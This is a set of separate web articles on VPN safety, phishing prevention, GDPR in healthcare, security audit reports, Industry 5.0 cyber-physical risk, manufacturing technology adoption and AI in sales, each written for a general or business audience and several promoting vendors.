- Free VPN tools limit data usage: VPNs are great for protecting data or hiding a user’s location when watching a movie from a streaming service that is not available in their region. However, a free VPN typically limits the amount of data users can use through the tool. This could include limiting the amount of data they can use per month, limiting the amount of time the VPN is available per browsing session, or unblocking certain websites only. Therefore, free VPN tools are not ideal for people who want to protect their data or mask their location for a considerable length of time.
- Free VPNs slow down users’ internet speed: Similar to the data-limiting issue above, free VPNs may provide slower internet speeds than premium tools. Even free VPN options from reputable vendors will provide a slower internet connection than available through their paid-for options. They will also prioritize internet speeds for their paying customers, which can further slow down their free services.
- Free VPN tools target users with ads: Free VPNs also use advertising to generate revenue, which means users’ data can be shared or targeted without their permission. This is frustrating for users because ads can also slow down the user’s internet connection or contain malware. The presence of ads on a free VPN service can also be a privacy concern because it is likely the provider is sharing users’ online activity with third-party services. Paid-for VPNs include ad-blocking tools, as well as features like malware protection and unlimited bandwidth, which keep users’ data secure.
Which Features Make a Secure and Safe VPN?
The question of how secure are VPN services typically depends on the VPN being used. A VPN from a reliable provider will feature encryption for the user's data and online browsing history to shield them from hackers and ISPs.
Is using VPN safe? That is reliant on a provider that ensures online privacy, provides transparent privacy policies, fixes data leaks, and does not track its users. The best VPN tool or application contains the following features:
- Internet Protocol (IP) address leak prevention: The core purpose of a VPN is to hide or disguise a user’s IP address and prevent anyone from tracking their online activity. However, a VPN can sometimes include flaws that result in the user’s IP location being leaked. It is therefore important to look for a provider that actively prevents IP address leaks. Check reviews online to see if they have a history of IP address leakage.
- No information logging: No-log VPNs do not collect, or log, data that users share on the network, such as login credentials, files they download, and their search history. This is key to ensuring users’ online privacy and protecting their anonymity from other internet users. It also ensures that a user’s information is protected, even if an attacker gains unauthorized access to a VPN tool. When considering a VPN, check whether it logs online activity, logs and periodically purges data, or discloses user information in any other scenario.
- VPN kill switch: In case a VPN connection drops, the user’s internet access will switch to their regular connection. A VPN kill switch feature automatically exits specific programs if an internet connection becomes unstable to reduce the risk of sensitive data being leaked by applications.
- Multi-factor authentication (MFA): Any VPN program should be as secure as possible to ensure that only authorized users can gain access to it. MFA enables a user to prove their identity, that they are who they say they are, before they are given access to the VPN. For example, upon logging in to the VPN using their username and password, the user can then be sent a code via Short Message Service (SMS) or a notification that they can approve on their mobile phone. This extra level of security ensures only the right people can access a VPN and makes it more difficult for a hacker to intercept.
How Fortinet Can Help?
Fortinet provides a range of secure VPN tools with its FortiGate Internet Protocol security (IPsec)/secure sockets layer (SSL) VPN solutions. The FortiGate VPN offerings are high-performance, scalable VPNs that provide users and organizations with access control and consistent security policies across all their applications, devices, and locations.
The FortiGate VPNs offer secure communication between multiple endpoints and networks through IPsec and SSL technologies. This ensures that users’ data is protected in high-speed motion, which prevents them from falling prey to data breaches or cyberattacks such as man-in-the-middle (MITM) attacks. | <urn:uuid:9f78c202-e23a-4f3c-9ec2-bbfda3213aec> | CC-MAIN-2022-40 | https://www.fortinet.com/resources/cyberglossary/are-vpns-safe | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334912.28/warc/CC-MAIN-20220926144455-20220926174455-00394.warc.gz | en | 0.918573 | 1,639 | 2.625 | 3 |
At the beginning of May, a massive phishing scam hit Gmail users. The scam came in the form of an email (from someone the Gmail user had communicated with previously) with a link to open a Google document. If a user clicks on the link to the Google doc and logs into their Google account, hackers are able to steal account information, contact, passwords and more from the account. Luckily, Google was able to react quickly and very few users were affected by the scam. However, this is not the only phishing scam and it won’t be the last time a major platform is hit by a phishing scam. In fact, phishing scams are some of the oldest scams on the Internet but even though they are well known, they are still very effective. Here are the top eight ways to protect yourself and your company from phishing scams: 1. Be cautious with emails that request personal information Your bank, healthcare provider, the IRS and credit card company will not ask for personal information via email. Also, companies like Facebook or Gmail will not ask for passwords in emails. Do not click on any links or download attachments that request your personal information. 2. If you are unsure, call the company If you receive an email and are truly unsure whether or not the request is legitimate, call the company that is supposedly sending the email. If you can’t call the company (like Facebook), then log on to their website and use their Help feature to learn if the request is legitimate. 3. Know how to identify a fake email Most of us are in a hurry or multitasking when we are checking our email. Hackers know this and they are very good at creating emails that look very professional or similar to the real email addresses. But if you look closely, you will almost see a type or contact address that is off so take the time to pay attention to the sender before you open or click a link. 4. Be wary with links within email Unless you are completely certain that the email is from a trusted source, be cautious about links in email. Instead of clicking a link, open new browser and type the URL directly into the address bar. Phishing links are usually masked as legitimate links but then can redirect you to a different site 5. Keep your browser up to date Popular browsers often update to include the latest security patch. Browsers are constantly observing phishing scams and vulnerabilities and updating to protect their users against these new scams. If you haven’t updated your browser, even if you are getting a reminder, now might be the time. 6. Create a SPAM filter for your emails SPAM filters can help protect against viruses or blank senders so that suspicious emails never even reach your inbox. 7. Use pop-up blockers Not all phishing attacks happen through emails. Many hackers use pop-ups as the source of phishing scams. Pop-up blockers can help protect you from unwanted pop-ups when you are browsing. 8. Check your accounts on a regular basis Most phishing scams are aimed at obtaining financial account information. Be certain that you are regularly checking your accounts for any suspicious behavior. The most important piece of advice against phishing attacks is to remain alert. Even though many of these scams seems simplistic and are easy to spot, many of them are quite sophisticated. Stay alert when checking your emails from anyone and train your team to do the same and you can decrease the threat of phishing attack. | <urn:uuid:e8251e30-d036-453e-9022-b1f7b1ebed82> | CC-MAIN-2022-40 | https://gxait.com/business-strategy/prevent-phishing-scams-attacking-business/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336978.73/warc/CC-MAIN-20221001230322-20221002020322-00394.warc.gz | en | 0.951416 | 699 | 2.53125 | 3 |
Safe Software: Making the Impossible Possible Using Spatial Data
Data protection regulations define how an individual’s personal information can be used by organizations, businesses and government. These regulations also contain safeguards that seek to ensure healthcare data is not susceptible to attack, misuse or misappropriation. As most know, misusing an individual’s healthcare data or not properly following regulation guidelines can hold especially serious long-term consequences. This spring, the GDPR was adopted with the aim of having one set of rules applicable throughout the European Union (EU). This has significant implications not only for EU-based organizations, but also for non-EU based organizations that conduct business or business communications in EU countries. The GDPR further aims to ensure privacy by design or default, meaning that data protection measures must be implemented across all data processing activities and endpoints. These changes are not revolutionary; the key principles, concepts and themes of the current data protection system remain. The new rules build on what is already in place with the addition of several new requirements. The Healthcare industry is facing multiple challenges when it comes to protecting sensitive data. This paper provides an overview of how the recent EU General Data Protection Regulations will affect healthcare organizations. | <urn:uuid:d432d755-acde-4c23-8075-91b020cd50cb> | CC-MAIN-2022-40 | https://em360tech.com/continuity/white-papers/healthcare-organizations-know-gdpr | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337404.30/warc/CC-MAIN-20221003070342-20221003100342-00394.warc.gz | en | 0.914554 | 243 | 2.640625 | 3 |
In today’s world, where a huge amount of information is generated from multiple platforms, all organizations need to ensure that their information is safe from all kinds of cyber threats. The biggest threat that attacks organizations is the vulnerability of cyber security. According to a report by ITRC, data breaches have exceeded the total number of data compromises in 2020 by 17 percent.
Cyber security is a major concern for a lot of organizations today. Organizations are losing millions of dollars every year due to data breaches. The situation is getting worse each day as businesses are not aware of the latest techniques used by hackers. This makes understanding a security audit report all the more important.
Hackers are using sophisticated techniques to bypass apps and networks to steal confidential data. Organizations must conduct regular security audits to make sure that confidential data is not leaked to hackers.
What is a Security Audit?
It’s no secret that most businesses use the Internet for communicating, storing data, and doing business. However, it’s also no secret that many cybercriminals out there are looking to access this data for their gain. Therefore, it pays to understand the best ways to protect your business from these cybercriminals.
The security audit is a comprehensive assessment of a business or organization’s security policies, procedures, and technologies. The security audit is a fact-finding mission to investigate a company’s network and information security practices.
The objective of a security audit is to identify vulnerabilities and make recommendations to the business. Performing security audits make businesses more secure from security breaches and data loss. A security audit involves a detailed examination of a business’s security policies, procedures, and technologies.
A security audit may be performed by a third party or by the business itself and it does not necessarily have to be a one-time activity. A business can opt for a security audit on a periodic basis.
5 Common IT Security Audit Standards
The auditing process is critical for maintaining compliance with IT security standards. Still, the sheer volume of standards out there is enough to make even the most seasoned audit professionals lose sleep at night.
But the good news is that most of the standards are in some way interconnected. That means that you can comply with multiple standards in many cases by following the same audit protocol.
For example, If you are following one of the ISO standards, you are at least in compliance with some key security standards, including many directly related to the ISO standards.
Let’s find out some common compliance standards:
1. ISO 27001
ISO 27001 is the International Standard for Information Technology – Security techniques – Information security management systems – Requirements. ISO 27001 is an information security management standard that enables an organization to improve its security posture.
There are many ways to improve your information security posture. Still, this standard provides a framework of best practices that can make it easier for your organization to identify, analyze, and manage the risks of your information assets.
2. PCI DSS Compliance
PCI DSS is a set of 12 requirements that specifically target how organizations store, process, and transmit cardholder data. The Payment Card Industry Security Standards Council (PCI SSC) developed the PCI DSS to protect against credit card fraud.
The PCI Security Standards Council (PCI SSC) maintains the PCI DSS, the de facto global standard for organizations that handle credit card information. The PCI DSS also applies to organizations that store, process, or transmit any cardholder data, which includes the following: Name, address, and Social Security number (SSN).
Related Read: Woocommerce Security Audit
3. NIST Cyber-Security Framework
The NIST Cyber-Security Framework (NIST CSF) defines a set of best practices that enables IT organizations to more effectively manage cybersecurity risks. The NIST CSF promotes the use of risk management as a means to achieve organizational objectives for cybersecurity.
The NIST CSF is a voluntary, risk-based approach to cybersecurity and offers flexible and repeatable processes and controls tailored to an organization’s needs. The NIST CSF is a set of standards and guidelines that federal agencies can use to comply with the Federal Information Security Modernization Act (FISMA).
Learn more about NIST Security Audit
SOC 2 is an auditing procedure that ensures your service providers securely manage your data to protect the interests of your organization and the privacy of its clients. This compliance is necessary to meet the standards of your organization’s clients and to stay compliant with the industry standards.
SOC 2 compliance ensures the security of your company’s information assets and protects the interests of your organization. It is a certification of trust, which says that your company protects the type of information that is considered personal and private. SOC 2 is one of the most widely used standards for third-party service providers, and is an absolute must for any organization that is looking to be compliant with the industry standards.
The Health Insurance Portability and Accountability Act (HIPAA) is a federal law that requires covered entities to protect the confidentiality, integrity, and availability of electronic health information that they create, receive, maintain, or transmit.
HIPAA protects the privacy and security of health information and sets national standards for how health care providers, health plans, and health care clearinghouses and their business associates must work together and with covered entities to ensure the safety and privacy of personal health information.
Why do you need a Security Audit Report?
A security audit report can be defined as a comprehensive document containing a security assessment of a business or an organization. It aims to identify the weaknesses and loopholes in the security of the organization, and therefore, it is an important document that can help an organization secure itself.
The security audit report is one of the most important documents used to assess the strengths and weaknesses of the security of an organization.
A security audit report typically lists all the audit team’s findings, which can be in the form of misconfiguration errors, vulnerabilities, or any other security defects in a system. The audit report also recommends remediation actions to the respective management to improve the security of their organization.
Some other use cases of security audit reports are:
- Compliance and Standards
- Global and local laws
- Customer Trust and Reputation
Key Components of Security Audit Report
One of the main goals of any audit is to provide actionable feedback so that the client can work towards improving their security. This feedback comes in the form of the report generated at the end of the test.
A security audit report may contain several different sections. There can be a section with information about the deliverables, audit scope, timelines, details about the testing process, findings, recommendations, etc.
Although there are many different types of penetration tests or hybrid application analysis, they all share key components of a security audit report mentioned below:
Title of the security audit report.
2. Table of Contents
The table of contents is an essential part of the audit reports. They provide a quick and convenient way to view the most important information in the report.
The table of contents is especially useful in large and detailed audit reports. It helps to quickly locate any detailed information, such as the auditor’s name, the scope of the audit, the date of the audit, and the number of pages in the audit report.
3. Scope of Audit
Scope of audit refers to a broad description of what is included in a project or the scope of a contract. In the scope of work, the project manager and other stakeholders identify the work needed to accomplish the project purpose.
The description section in the security audit report is the detailed technical description of the security risk. The description contains:
- All relevant details about the issue
- How to reproduce the issue
- How easily can a hacker exploit it
- The severity of the issue
- CVSS Score of the vulnerability
The recommendation section contains details about the fix or patch that needs to be done to mitigate the security risk. Here, the fix depends on the type of security vulnerability.
For Example, Developers can mitigate an XSS by escaping or encoding characters and using a WAF. But, the XSS can be prevented by not using the outdated version of jQuery.
References are important from a company’s point of view. References could be a blog, a news item, a whitepaper, or any informative material that might help the company to better understand the vulnerability and its fix.
Who prepares a Security Audit Report?
A security audit report is prepared by a team of security auditors (Internal or External) who performs an audit on businesses or their websites to ensure that the business is compliant with the industry standards and regulations.
In most cases, organizations hire external security auditors to perform an audit, and they prepare a security audit report.
External security auditors are a very important aspect of any organization opting for a security audit by a third-party vendor. The organization should consider a well-known or reputed vendor that has prior experience and trust factor in the industry.
The purpose of an audit could be to determine the organization’s risk, provide advice leading to improvements, test the controls in place, provide assurance that the organization is following an established set of procedures, etc.
Organizations may perform a security review for various reasons, including meeting compliance requirements, gaining a better understanding of an organization’s security posture, or improving the overall security.
Reading Guide: How Much Does an IT Security Audit Cost?
How does Astra help you get a security audit report?
Cyber security has become a major concern for organizations. The growth of hackers and cybercriminals has increased to hacking a website, a database, or a server. They hack into the accounts of the companies and steal critical information. So, it is very important to keep track of everything that is going on in your company.
Astra is a cybersecurity firm offering a range of high-end cyber security services and solutions for security audits, penetration testing, and vulnerability assessment, vulnerability scanning, malware removal, and website firewall.
Astra has a team of world-class security experts who work round the clock to keep clients secure from hackers. Astra’s team is one of the best in the industry and has successfully conducted many security audits for a wide range of clients.
Related Read: PHP Penetration Testing
Key Highlights in Astra’s Security Audit Report
Astra’s Security Audit Report has the following key features:
1. Industry Standard Security Testing
Astra’s security specialists perform industry-standard security testing with over 2500+ tests that follow OWASP, SANS, ISO, and CREST guidelines and compliance requirements.
2. Detailed Vulnerability Analysis
Astra’s Security Scan dashboard and pen-test report show a detailed analysis of vulnerabilities, including the impact, severity, CVSS score, affected parameters, and steps to reproduce each vulnerability with video proofs-of-concept (PoCs).
3. Steps to Fix Vulnerabilities
Each vulnerability has a section within the report that describes it in detail and speaks of fixing such flaws and provides an overview of each mitigation with steps to fix (with external informative resource references).
4. Easy to access
The report can be downloaded easily from Astra’s main Pentest dashboard. You can either download the report in the format of PDF or Email.
After a penetration test or a security audit, the first thing a client would ask for is the findings from the security audit report. This report must be a comprehensive security report that should include the entire audit process, vulnerability details, testing methodologies, any other findings, and finally recommendations on how to prevent the vulnerability as well as the steps to fix it. Security issues can be a real pain in the neck, but Astra can help you fix your problems.
1. How Much Does an IT Security Audit Cost?
The cost of IT security audit varies according to the scope and depth of the audit.
2. Why do you need a Security Audit Report?
A security audit report lets lists down all the existing vulnerabilities and categorizes them according to severity. It also provides you with the necessary measures to fix those issues.
3. How Astra helps you get a security audit report?
Astra Security has an interactive and collaborative security audit reporting procedure. Not only do you get a detailed PDF report along with video POCs on how to reproduce vulnerabilities, but you also get expert assistance from security engineers at Astra while working on the issues.
4. Do I also get rescans after a vulnerability is fixed?
Yes, based on the plan you get 1-3 rescans. You can avail these scans within 30 days of the initial pentest completion. | <urn:uuid:9c83464a-0a48-4f68-82a3-8da329aef13e> | CC-MAIN-2022-40 | https://www.getastra.com/blog/security-audit/security-audit-report/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337516.13/warc/CC-MAIN-20221004152839-20221004182839-00394.warc.gz | en | 0.920121 | 2,665 | 2.71875 | 3 |
Over more than 300 years, a series of industrial revolutions has transformed the way we live for the better. Each era has been marked by the introduction of mechanization that has accelerated the creation and delivery of goods and services at scale and at lower cost. The journey has required tremendous innovation to fuel an advanced global economy and has made life as we know it possible. However, it has also introduced risk, initially to personal safety, then to networks and systems, and eventually the two merged to introduce cyber-physical risk.
Today, we sit on the cusp of the next industrial age—Industry 5.0, which presents additional opportunities for better business outcomes, but also new, more dangerous risks organizations have never experienced before. Let's take a brief look back at the historical context of how we got here and what's required to better protect an ever-expanding ecosystem of connected systems and devices that critical infrastructure, healthcare organizations, and enterprises rely on.
The first industrial revolution emerged in the 1700s, humans began harnessing steam power to dramatically enhance industrial productivity. Mechanization simplified farming, accelerated the manufacture of textiles and clothing, and set the stage for the next era of industrial change with the drilling of the first oil well around 1860.
In the late 1800s and early 1900s, innovations such as electricity and assembly line production enabled goods to be produced faster, on a larger scale, and at a lower cost. It was also the era of "planes, trains, and automobiles." A series of firsts provided a glimpse into a future where mobility was affordable and movement of goods and people across vast distances could happen in a matter of hours. A network of telephone lines across the United States further removed distance barriers, making it possible to communicate instantly.
During these first two periods of industrial revolution, workers' personal safety was at heightened risk. Machinery and power sources required human intervention to operate and monitor them with few, if any, safety mechanisms in place. In the early 1900s, progress in the form of federal regulations and workers' compensation to drive improvements in workplace conditions and safety were introduced and accident rates began to fall. Then came automation along with network connectivity and the nature of risks changed.
Beginning in the 1970s, developments such as programmable logic controllers (PLCs) and partial automation enabled certain industrial processes to be carried out without human assistance. Industrial control systems (ICS) networks emerged to run the world's infrastructure, and supervisory control and data acquisition (SCADA) systems helped engineers collect, analyze, and visualize data to optimize operations for efficiency and productivity gains. The advent of the internet and network connectivity introduced a new type of risk to organizations—cyber threats.
Industrial assets have long life cycles, and no modern security controls. However, because operational technology (OT) networks were initially isolated from IT networks, the risk of a targeted cyberattack was negligible. Threat actors were not yet at the stage where they were openly targeting these networks to inflict physical damage. The level of effort by a threat actor was simply too great when there was already ample opportunity to create havoc and reap rewards by targeting IT networks and systems.
The fourth industrial revolution puts technology at the forefront, connecting the automated technologies introduced during Industry 3.0 to the broader enterprise IT network, as well as the internet. This digitization of manufacturing—characterized by cyber-physical systems and the Industrial Internet of Things (IIoT)—has been a game changer, giving rise to the "smart factory." Leveraging artificial intelligence, machine learning, and real-time data, this newfound interconnectivity between factory machinery and the cyber world has enabled the optimization of physical processes, operational resilience, supply chains, and business agility.
Despite its many benefits, Industry 4.0 has exposed industrial assets to cyber risk that they were never designed to be able to combat. As these assets began to connect to IT systems, their unguarded exposure and the potential for significant damage made these networks attractive targets for cyberattacks. It is for this reason that Claroty was founded in 2015.
Adversaries understand the importance of OT networks and during Industry 4.0 began to attack them boldly to wreak havoc. The cyberattacks on the Ukraine power grid in December 2015 and December 2016 were among the first elements of proof of threat actors targeting critical infrastructure. The second wave came with WannaCry and subsequently NotPetya, which was devised to spread quickly and indiscriminately. The widespread, collateral damage to OT networks and disruption to operations revealed to security professionals just how poor the cyber risk posture of their OT networks was and prompted swift actions in many of the largest companies.
Since the onset of the COVID-19 pandemic, the acceleration of digital transformation and remote access across all critical infrastructure sectors has compressed years of industrial change into months. A "newer" wave of attacks that take advantage of cyber-physical integration and a proliferation of connected devices is different in severity and priority because they put lives and livelihoods at risk. While attacks on IT networks and data breaches that began decades earlier are very costly and have other financial implications, they don't threaten the physical world we live in and the systems we depend on, as do attacks against hospitals, oil pipelines, and other types of critical infrastructure. The 2021 incidents involving Colonial Pipeline, JBS Foods, the Oldsmar, Florida water supply (just to name a few) brought this into sharp focus.
Although organizations cannot prevent bad actors from targeting them, they can make it harder for these actors to achieve their mission and thus move on to easier targets. For years, The Claroty Platform has been helping organizations identify, manage, and protect their OT assets and a range of connected devices.
We now sit at the brink of the fifth industrial revolution, which will build upon the inter-machine connectivity of Industry 4.0 by enhancing human-machine interaction. Industry 5.0 recognizes that human creativity and critical thinking cannot be replicated by machines. As such, ongoing innovation strives to optimize processes by delegating repetitive or predictable tasks to automation while also integrating human operators into production processes.
In this new industrial revolution, the IT-OT convergence that began under Industry 4.0 continues to grow in terms of scope and intensity to form the Extended Internet of Things (XIoT), which holistically refers to the increasingly complex and varied set of connected devices within enterprise networks, including the following asset categories:
Industrial IoT (IIoT) and operational technology (OT) assets, which handle all cyber-physical processes and equipment, such as the programmable logic controllers (PLCs) that support critical processes in industrial environments. These systems are connected internally to workstations that can typically be accessed remotely for maintenance; other cyber components include IIoT devices such as smart sensors. The 16 critical infrastructure sectors as defined by CISA—from manufacturing to energy to transportation—rely on these interconnected processes and systems.
Healthcare IoT assets, including medical imaging equipment such as MRI machines and CT scanners, as well as internet of medical things (IoMT) devices such as smart vitals monitors and infusion pumps that support critical care delivery in healthcare environments. These systems are usually connected to an organization's IT networks.
All other IoT devices used in smart cities, smart grids, enterprise IoT environments, building management systems (BMS), and any kind of "smart" technology assets.
Industry 5.0 steps up to deliver additional top-line and bottom-line benefits modern enterprises are prioritizing, including sustainability, better customer experiences, and greater profitability. At the same time, the extensiveness of convergence and expanding ecosystem of devices, makes the implementation of strong network segmentation and a strong cybersecurity program that covers all network assets fundamental for modern enterprises.
Think about the following scenarios that have already occurred:
A ransomware attack on a hospital may have led to the death of a baby, since healthcare workers didn't have access to medical equipment and devices they usually rely on to monitor birth progress.
Threat actors infiltrated a high-tech breakroom vending machine with unfettered access to an OT network worth billions of dollars, to propagate malware across multiple sites.
Vulnerabilities in a wi-fi module used in embedded devices for industries like agriculture, automotive, energy, gaming, industrial, and security allowed threat actors in the proximity of the module to bypass the wi-fi network password and completely take over the device.
At Claroty, we are building a future where cyber and physical worlds safely connect to support our lives, covering all types of connected assets that comprise the XIoT. Learn more about how we are advancing our mission to help organizations position themselves to participate in Industry 5.0 and unlock better business outcomes while building resilience to defend against evolving cyber threats. | <urn:uuid:52d742cd-ba49-4de0-a32f-5a8398b72f43> | CC-MAIN-2022-40 | https://claroty.com/blog/industry-5-0-and-the-extended-internet-of-things-xiot-a-historical-context | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337680.35/warc/CC-MAIN-20221005234659-20221006024659-00394.warc.gz | en | 0.957104 | 1,791 | 3.46875 | 3 |
Infographic: What Technology Do Manufacturers Use?
Manufacturing as an industry has been experiencing growing digitization, with organizations implementing tools and solutions that enable the more effective leveraging of data and the use of smart devices in operations.
This convergence of manufacturing practices and digital technology is most commonly referred to as Industry 4.0, which is the driving force behind many of the changes we’ve seen in manufacturing in recent years.
Related Post: What Is Industry 4.0?
By using technology in business operations, manufacturers can see improvements and growth in a number of different areas, whether it’s supply chain management (SCM), customer experience, or business process automation.
With this infographic, you can see what technology manufacturers are investing in and utilizing, and get a better understanding of what they are using it for.
Industry 4.0 is a major competitive differentiator for organizations in 2022, and the disruption caused by the use of its associated technology is broadly acknowledged by those in the industry.
Just 9% of organizations have updated their business models to prepare for Industry 4.0, but among companies that have experienced growth of at least 20%, that figure rises to 30%.
And yet, many manufacturers have been slow to adopt new practices and solutions that take advantage of the benefits they can provide.
That is changing, however. Consider sensors, to take a common example of digital transformation in manufacturing.
Sensors can be applied on factory floors to feed data and information to software systems, which can then analyze that data and provide stakeholders with information that can be acted on in real-time.
This particular use case has been pursued by organizations looking to reduce maintenance and repair costs for their machinery, but sensors and smart devices can be used for any number of purposes, such as workflow streamlining, logistics fulfillment tracking, factory floor compliance, and quality control.
Observations of digital maintenance and reliability transformations in heavy industries reveal the potential for companies to increase asset availability by 5 to 15% and reduce maintenance costs by 18 to 25%.
It should come as little surprise, therefore, to learn that the global smart sensor market is anticipated to grow quickly, from an estimated $36.6 billion in 2020 to $87.6 billion in 2025 at a CAGR of 19%.
Technologies like this that aid in the utilization of data and technology are drastically shifting the direction of digitization in the manufacturing industry.
Now let’s go more in-depth into each of the technologies that are most important to manufacturers.
71% of manufacturers currently employ data analysis in their operations.
The use of data analysis in manufacturing provides several benefits that can help organizations better manage their operations.
These benefits broadly include:
- Demand forecasting
- Order fulfillment
- Supplier performance
- Quality control
- Inventory management
- Machine reliability monitoring
Much of the data necessary to more effectively perform these processes is already available to companies—they’re just failing to utilize it for analysis.
Up to 73% of company data is unused by businesses.
Increased use of this data, through the adoption of analytics platforms like PowerBI, allows companies to leverage previously unused data for the benefit of their operations.
99% of manufacturers use (64%) or plan to use (35%) cloud computing in their operations.
In order to conduct data analysis and make effective use of other modern technologies, organizations require a tech infrastructure that is able to handle large data sets and be scalable.
Cloud solutions are today highly sought-after by businesses, particularly SMBs, because the barrier of entry is low—that is, overheads on physical hardware are not necessary—and they are easily scalable if more users, power, or storage is needed.
Because of this, cloud computing services and their use in manufacturing is receiving a lot of interest among businesses, much in line with other industries that are also migrating their operations and data to the cloud.
Enterprise Resource Planning (ERP)
58% of manufacturers use ERP systems.
ERP solutions are necessary for modern businesses to avoid becoming siloed.
Siloing refers to a process in which systems containing data become more detached, often because of department solutions lacking integrations and consequently resulting in a situation where information is inefficiently used within companies.
ERPs allow individual solutions and modules, which are integrated into a single platform, offering the opportunity to share data and information more effectively.
Robotic Process Automation (RPA)
43% of manufacturers already use robotic process automation, while a further 43% plan to deploy RPA initiatives.
RPA can be used for a variety of purposes—most commonly to automate workflows and business processes that otherwise require a substantial amount of manual labor.
In manufacturing, RPA can be used to improve compliance, automate quality assurance processes, and facilitate order fulfillment.
As organizations look to streamline their processes and remove unnecessary costs in their operations, technologies like RPA will become a common fixture in manufacturing enterprises.
Internet of Things (IoT)
40% of manufacturers currently deploy IoT technology, while a further 47% plan to do so.
The Internet of Things in manufacturing is referred to as the “Industrial Internet of Things (IIoT)”.
IoT devices, as we noted in the case of how sensors can be used, are being used in increasing volumes as manufacturers look to combine the power of the cloud, the strength of data analysis platforms, and the large data sets generated by smart devices.
As companies learn how to efficiently leverage smart devices and the data that is generated from them, the importance of the IIoT will continue to grow.
Modern technology used by manufacturers varies widely in its uses and applications.
The most significant tech, in terms of adoption today, concern the application and leveraging of data and the implementation of devices and hardware that can bridge the gap between the factory floor and the insights delivered to stakeholders.
As Industry 4.0 continues to play a large role in shaping how the operations of manufacturers are conducted, we can expect to see greater adoption of these key technologies in coming years.
If you are in need of digital solutions for your manufacturing organization, consider taking a look at our Digital Innovation service and learn how you can leverage technology for your business goals. | <urn:uuid:5ff90e2a-411d-4acd-8dcf-6157b2102206> | CC-MAIN-2022-40 | https://www.impactmybiz.com/blog/what-technology-do-manufacturers-use/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334528.24/warc/CC-MAIN-20220925101046-20220925131046-00594.warc.gz | en | 0.947991 | 1,307 | 2.71875 | 3 |
Quantum Key Distribution (QKD) represents the next generation of cybersecurity for the government. By leveraging quantum mechanics and encryption keys, two end locations in different places can exchange and send files over in seconds. These files are safe because hackers can’t steal encryption keys. Considered to be the most secure form of information sharing, QKD leverages instant threat detection and Zero Trust Architecture to notify teams when there is a threat detected.
In the government arena, QKD is highly effective and will be an important tool in the cybersecurity defense of our nation, and many countries in Europe and Asia are paving the way for implementations in the U.S. These were the key themes of our recent Government Technology Insider “Quantum Key Distribution: Securing Future Network Communications” podcast interview where Lee Sattler, Distinguished Engineer at Verizon, broke down the fundamentals of QKD.
“Quantum Key Distribution leverages the properties of quantum mechanics,” said Sattler. “With QKD, we are encoding information on a single photon, and this is how we can apply the quantum mechanical properties to provide security. We can actually detect when someone is trying to eavesdrop on a QKD line, which is possible because of quantum mechanics laws.”
Listen to the full podcast below: | <urn:uuid:d176441f-bdc5-4d82-9eac-5dcbfef99727> | CC-MAIN-2022-40 | http://governmenttechnologyinsider.com/quantum-key-distribution-podcast-on-securing-future-network-communications/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.43/warc/CC-MAIN-20220928020513-20220928050513-00594.warc.gz | en | 0.897661 | 273 | 2.78125 | 3 |
The Bangalore Electricity Supply Company (BESCOM) is planning to start building its own fiber-optic network in the city. The new cables will be laid along with the underground power cables that the electricity company install as part of its effort to bring safety, security, and aesthetics to the city landscapes.
Bangalore, being the Silicon Valley of India in the southern state of Karnataka is a crowded city with the old electrical infrastructures posing threats to the public. BESCOM‘s initiatives to place both power cables and fiber optic cables will ensure safety to the pedestrians. Apart from that, BESCOM can utilize the optical fibers for its own purpose and also thinks to lease to other service providers.
BESCOM Managing Director C. Shikha said the decision to include deployment of optical fiber cables along with underground electrical cables was taken as the process will yield better returns at minimal extra cost. The project will be undertaken over the next three years. Fiber deployments along the power transmission cables and leasing it generate extra revenue by electricity companies is something new of its kind in Indian. The current strategy would make BESCOM the first government-owned electricity distribution company have a self-owned communication system.
BESCOM officials said that the optical fiber cables are essential components in the implementation of the R-APDRP project, which involves data acquisition, processing, and management, as well as for the Smart Grid System.
The project for underground installation of power transmission cables for Bangalore city was announced in the Karnataka State budget in 2018 and was pitched as a solution to increase quality and reliability of power supply, reduction in transmission and distribution losses, reduction in unauthorized connections due to tampering and decrease in the number of accidents due to snapping of overhead lines, among others.
What is the R-APDRP Project?
In order to bring reforms to the Power Sector, the Central Ministry of Power has launched the Restructured Accelerated Power Development and Reforms Program (R-APDRP). The scheme is a Central sector scheme launched in July 2008.
The focus of the program is on the actual demonstrable performance in terms;
– AT&C loss reduction
– Establishment of reliable and automated sustainable systems for the collection of baseline data
– Adoption of information technology in the areas of energy accounting
– Consumer care and strengthening of Distribution network of State Power Utilities.
The R-APDRP scheme envisages the establishment of a supervisory control & data acquisition system and distribution management system in large towns. | <urn:uuid:eff5bca8-56bb-4e15-92d3-50193ea343e8> | CC-MAIN-2022-40 | https://www.fomsn.com/fiber-optic-news/sobhana/bescom-to-build-own-fiber-network/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.43/warc/CC-MAIN-20220928020513-20220928050513-00594.warc.gz | en | 0.944415 | 513 | 2.546875 | 3 |
You don’t have to be entrenched in the tech world to have heard the term, “artificial intelligence,” but what is artificial intelligence, or AI, as it’s commonly known? Simply put, AI is the simulation of human intelligence processes performed by machines or computer systems.
Nowadays, AI is being used to carry out many jobs previously held by humans, and while this concept may sound futuristic and even scary to many, there’s no need to panic. Most AI functions are designed to make life easier.
Whether you know it or not, most of us use AI in some form every day. Only 33 percent of people think they use AI, according to one study, but in reality more than 77 percent use some form of AI-powered devices or services.
For example, AI is used by most banks to personalize your experience on their mobile apps, while music services use AI to track your listening habits and then use that data to suggest other songs you may like to hear.
AI and Predictive Lead Scoring
As it relates to business, AI can be beneficial when used in systems and applications by automating repetitive, menial tasks that people used to do manually, thereby increasing company productivity and profitability.
More specifically, sales and marketing tools such as customer relationship management (CRM) software or sales automation platforms that contain AI technology not only can do simple, tedious tasks such as data entry, but also can identify patterns and trends in that data in just seconds, and tell users how best to use it.
With real-time information, sales teams become better equipped to service customers, respond to requests or challenges, and even predict customer buying behaviors. Understanding customer expectations and knowing how to manage them in advance is important not only for the timely delivery of existing products, but also for the promotion of new ones that customers may want or need downstream.
